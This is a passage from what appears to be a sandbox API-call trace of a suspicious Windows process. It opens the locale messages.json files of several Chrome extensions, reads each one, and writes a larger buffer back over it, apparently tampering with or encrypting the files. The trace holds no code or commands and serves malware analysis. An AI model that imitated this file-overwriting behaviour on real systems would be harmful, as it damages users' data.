lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.523] ReadFile (in: hFile=0x210, lpBuffer=0x26c4d78, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4d78*, lpNumberOfBytesRead=0x359f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0159.750] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.750] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x665, lpOverlapped=0x0) returned 1 [0159.751] CloseHandle (hObject=0x210) returned 1 [0159.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.752] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.753] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xce [0159.753] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.753] ReleaseMutex (hMutex=0x168) returned 1 [0159.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.753] ReadFile (in: hFile=0x210, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x359f2bc*=0xce, lpOverlapped=0x0) returned 1 [0159.754] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.755] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x656, lpOverlapped=0x0) returned 1 [0159.755] CloseHandle (hObject=0x210) returned 1 [0159.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.758] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.758] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x109 [0159.758] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.758] ReleaseMutex (hMutex=0x168) returned 1 [0159.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.758] ReadFile (in: hFile=0x210, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x359f2bc*=0x109, lpOverlapped=0x0) returned 1 [0159.759] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.760] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x691, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x691, lpOverlapped=0x0) returned 1 [0159.760] CloseHandle (hObject=0x210) returned 1 [0159.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.761] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.761] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x103 [0159.762] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.762] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.762] ReleaseMutex (hMutex=0x168) returned 1 [0159.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.762] ReadFile (in: hFile=0x210, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0x103, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x359f2bc*=0x103, lpOverlapped=0x0) returned 1 [0159.763] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.763] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x68b, lpOverlapped=0x0) returned 1 [0159.764] CloseHandle (hObject=0x210) returned 1 [0159.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.764] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.765] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x107 [0159.765] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.765] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.765] ReleaseMutex (hMutex=0x168) returned 1 [0159.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.765] ReadFile (in: hFile=0x210, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x107, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x359f2bc*=0x107, lpOverlapped=0x0) returned 1 [0159.766] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.766] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x68f, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x68f, lpOverlapped=0x0) returned 1 [0159.766] CloseHandle (hObject=0x210) returned 1 [0159.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.767] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.767] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xfe [0159.767] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.768] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.768] ReleaseMutex (hMutex=0x168) returned 1 [0159.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.768] ReadFile (in: hFile=0x210, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x359f2bc*=0xfe, lpOverlapped=0x0) returned 1 [0159.769] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.769] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x686, lpOverlapped=0x0) returned 1 [0160.006] CloseHandle (hObject=0x210) returned 1 [0161.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.254] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.254] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x112 [0161.254] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.254] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.254] ReleaseMutex (hMutex=0x168) returned 1 [0161.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.255] ReadFile (in: hFile=0x210, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x112, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x359f2bc*=0x112, lpOverlapped=0x0) returned 1 [0161.256] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.256] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x69a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x69a, lpOverlapped=0x0) returned 1 [0161.257] CloseHandle (hObject=0x210) returned 1 [0161.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.258] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.258] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x111 [0161.258] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.258] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.258] ReleaseMutex (hMutex=0x168) returned 1 [0161.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.259] ReadFile (in: hFile=0x210, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x111, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x359f2bc*=0x111, lpOverlapped=0x0) returned 1 [0161.260] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.260] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x699, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x699, lpOverlapped=0x0) returned 1 [0161.264] CloseHandle (hObject=0x210) returned 1 [0161.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.266] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.266] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb3 [0161.266] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.266] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.266] ReleaseMutex (hMutex=0x168) returned 1 [0161.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.266] ReadFile (in: hFile=0x210, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x359f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.268] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.268] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.268] CloseHandle (hObject=0x210) returned 1 [0161.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.269] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.269] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb3 [0161.270] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.270] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.270] ReleaseMutex (hMutex=0x168) returned 1 [0161.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.270] ReadFile (in: hFile=0x210, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x359f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.271] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.271] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.272] CloseHandle (hObject=0x210) returned 1 [0161.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.273] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.273] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb3 [0161.273] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.273] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.274] ReleaseMutex (hMutex=0x168) returned 1 [0161.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.274] ReadFile (in: hFile=0x210, 